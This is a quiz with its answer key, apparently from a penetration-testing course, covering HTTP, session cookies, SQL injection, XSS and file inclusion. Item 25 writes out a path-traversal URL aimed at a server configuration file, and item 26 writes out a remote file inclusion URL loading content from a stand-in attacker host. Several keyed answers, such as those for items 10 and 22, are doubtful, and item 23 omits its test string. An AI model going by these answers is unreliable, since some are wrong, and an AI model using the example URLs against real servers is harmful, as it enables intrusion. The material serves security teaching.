6.13.3 Quiz - Performing Post-Exploitation Techniques


28 Terms

1

Which two functions are provided by a web proxy device? (Choose two.)

  • caching of HTTP messages

  • scanning a web server for related contents

  • translating HTTP messages to FTP and SMTP messages

  • enabling HTTP transfers across a firewall

  • encrypting HTTP packets transmitted between web clients and web servers

  • caching of HTTP messages

  • enabling HTTP transfers across a firewall

2

Match the HTTP status code contained in a web server response to the description.

codes in the 200 range

related to successful transactions

3

Match the HTTP status code contained in a web server response to the description.

codes in the 300 range

related to HTTP redirections

4

Match the HTTP status code contained in a web server response to the description.

codes in the 400 range

related to client errors

5

Match the HTTP status code contained in a web server response to the description.

codes in the 500 range

related to server errors

6

Match the HTTP status code contained in a web server response to the description.

codes in the 100 range

informational

7

Which function is provided by HTTP 2.0 to improve performance over HTTP 1.1?

  • HTTP 2.0 compresses HTTP messages.

  • HTTP 2.0 provides HTTP message multiplexing and requires fewer messages to download web content.

  • HTTP 2.0 uses tokens as a mechanism to track web sessions.

  • Enabling HTTP transfers across a firewall.

  • HTTP 2.0 uses UDP instead of TCP as transport layer protocol.

  • HTTP 2.0 provides HTTP message multiplexing and requires fewer messages to download web content.

8

Why should application developers change the session ID names used by common web application development frameworks?

  • These session ID names are not published in public documents.

  • These session ID names can be used to fingerprint the application framework employed.

  • These session ID names are used randomly and make integration of frameworks impossible.

  • These session ID names typically contain a short length of numerical numbers and can be easily cracked.

  • These session ID names can be used to fingerprint the application framework employed.

9

A user is using an online shopping website to order laptop computers. Which mechanism is used by the shopping site to securely maintain user authentication during shopping?

  • IP address

  • session ID

  • username and password

  • one-time password assigned

  • session ID

10

What is the best mitigation approach against session fixation attacks?

  • Ensure that the session ID uses at least 64 bits of characters.

  • Ensure that the session ID is used after a user completes authentication.

  • Ensure that the session ID is exchanged only through an encrypted channel.

  • Ensure that the session ID changes from the default session name used by the web application framework.

  • Ensure that the session ID is exchanged only through an encrypted channel.

11

Which two attributes can be set in a web application cookie to indicate it is a persistent cookie? (Choose two.)

  • Expires

  • Max-Age

  • Domain

  • Secure

  • Path

  • Expires

  • Max-Age

12

Which international organization is dedicated to educating industry professionals, creating tools, and evangelizing best practices for securing web applications and underlying systems?

  • Common Vulnerabilities and Exposures (CVE)

  • Open Web Application Security Project (OWASP)

  • Institution of Electrical and Electronics Engineering (IEEE)

  • SysAdmin, Audit, Network and Security (The SANS Institute)

  • Open Web Application Security Project (OWASP)

13

Which component in the statement below is most likely user input on a web form?

SELECT * FROM group WHERE attack = 'network' AND a-type LIKE 'ping%';

  • ping

  • group

  • attack

  • a-type

  • network

  • ping

14

Which statement describes an example of an out-of-band SQL injection attack?

  • An attacker launches the attack on a web site and forces the web application to delay the query results.

  • An attacker launches the attack on a web site and views the query results immediately on the screen.

  • An attacker launches the attack on a web site and reconstructs the information by sending specific SQL statements.

  • An attacker launches the attack on a web site and forces the web application to send the query results via an email.

  • An attacker launches the attack on a web site and forces the web application to send the query results via an email.

15

A threat actor launches an SQL injection attack against a web site by sending multiple specific statements to the web site and reconstructing the key information the threat actor seeks. What type of SQL injection attack is the threat actor using?

  • blind

  • in-band

  • error-based

  • out-of-band

  • blind

16

An attacker launches an SQL injection attack on a web application by trying to force the application requesting the back-end database to perform multiple SELECT queries. Which technique exploits the SQL injection vulnerability on the web application?

  • Boolean

  • Error-based

  • Out-of-band

  • Union operator

  • Time delay

  • Union operator

17

Which type of SQL query is in the SQL statement select * from users where user = "admin";?

  • static query

  • stacked query

  • out-of-band query

  • parameterized query

  • static query

18

A company uses the Microsoft Active Directory service to manage the authentication and authorization of employee workstations. The company hires a cybersecurity professional to perform compliance penetration testing. Which type of penetration testing can be used to verify the proper configuration of the Active Directory service?

  • LDAP injection

  • SQL Union injection

  • HTTP command injection

  • Stacked query SQL injection

  • LDAP injection

19

What is a potentially dangerous web session management practice?

  • including the session ID in the URL

  • setting a cookie with the Expires attribute

  • setting a cookie with the Max-Age attribute

  • configuring a cookie with the HTTPOnly flag

  • including the session ID in the URL

20

A web application configures client cookies with the HTTPOnly flag. What is the effect of this flag?

  • It informs the web client that the cookie is a persistent cookie.

  • It forces the web browser to have the cookies processed only by the server.

  • It requires the web browser to establish a secure HTTPS link to the server.

  • It indicates to the web browser that web client-based code can access the cookie.

  • It forces the web browser to have the cookies processed only by the server.

21

An organization has developed a network security policy stating that newly purchased routers and switches must be configured with advanced security measures before deploying them to the production network. Which threat does this policy mitigate?

  • Redirect attack

  • Session hijacking

  • Kerberos vulnerability

  • Default credential attack

  • Default credential attack

22

An attacker sends a request to an online university portal site with the information:

SELECT * FROM group WHERE attack = 'network' AND a-type LIKE 'ping%';

Which type of vulnerability does the attacker try to exploit?

  • redirect

  • session hijacking

  • default credential

  • HTTP parameter pollution

  • HTTP parameter pollution

23

A company has hired a cybersecurity firm to assess web server security posture. To test for cross-site scripting vulnerabilities, the tester will use the string. Where would the tester use the string?

  • in an HTTP header

  • in an error message

  • in a terminal window on the server

  • in a user input field in a web form

  • in a user input field in a web form

24

According to OWASP, which three statements are rules to prevent XSS attacks? (Choose three.)

  • Use the HTML tag with JavaScript encoding.

  • Use HTTPS only mode for accessing web applications.

  • Use HTML escape before inserting untrusted data into HTML element content.

  • Use the HTML img tag with a combination of hexadecimal HTML character references.

  • Use attribute escape before inserting untrusted data into HTML common attributes.

  • Use JavaScript escape before inserting untrusted data into JavaScript data values.

  • Use HTML escape before inserting untrusted data into HTML element content.

  • Use attribute escape before inserting untrusted data into HTML common attributes.

  • Use JavaScript escape before inserting untrusted data into JavaScript data values.

25

After some reconnaissance efforts, an attacker identified a web server hosted on a Linux system. The attacker then entered the URL shown below,

http://192.168.46.82:45/vulnerabilities/fi/?page=../../../../../etc/httpd/httpd.conf

Which type of web vulnerability is being exploited by the attacker?

  • stored XSS

  • reflected XSS

  • directory traversal

  • cookie manipulation

  • directory traversal

26

An attacker enters the following URL to exploit vulnerabilities in a web application:

http://192.168.47.8:76/files/fi/?page=http://malicious.h4cker.org/cookie.html

Which type of vulnerability did the attacker try to exploit?

  • directory traversal

  • cookie manipulation

  • local file inclusion

  • remote file inclusion

  • remote file inclusion

27

Because of an insecure code practice, an attacker can leverage and completely compromise an application or the underlying system. What insecure code practice enabled this catastrophic threat?

  • lack of error handling

  • use of hard-coded credentials

  • overly verbose error handling

  • comments that contain too much information

  • use of hard-coded credentials

28

What is the best practice to mitigate the vulnerabilities from a lack of proper error handling in an application?

  • Use only a minimum set of error messages.

  • Use a strong algorithm to encrypt the transmission of error messages.

  • Use a well-thought-out scheme to provide meaningful error messages to the users but no useful information to an attacker.

  • Use a third-party hosting service to provide coded error messages and transmit them securely to users, software developers, and support staff.

  • Use a well-thought-out scheme to provide meaningful error messages to the users but no useful information to an attacker.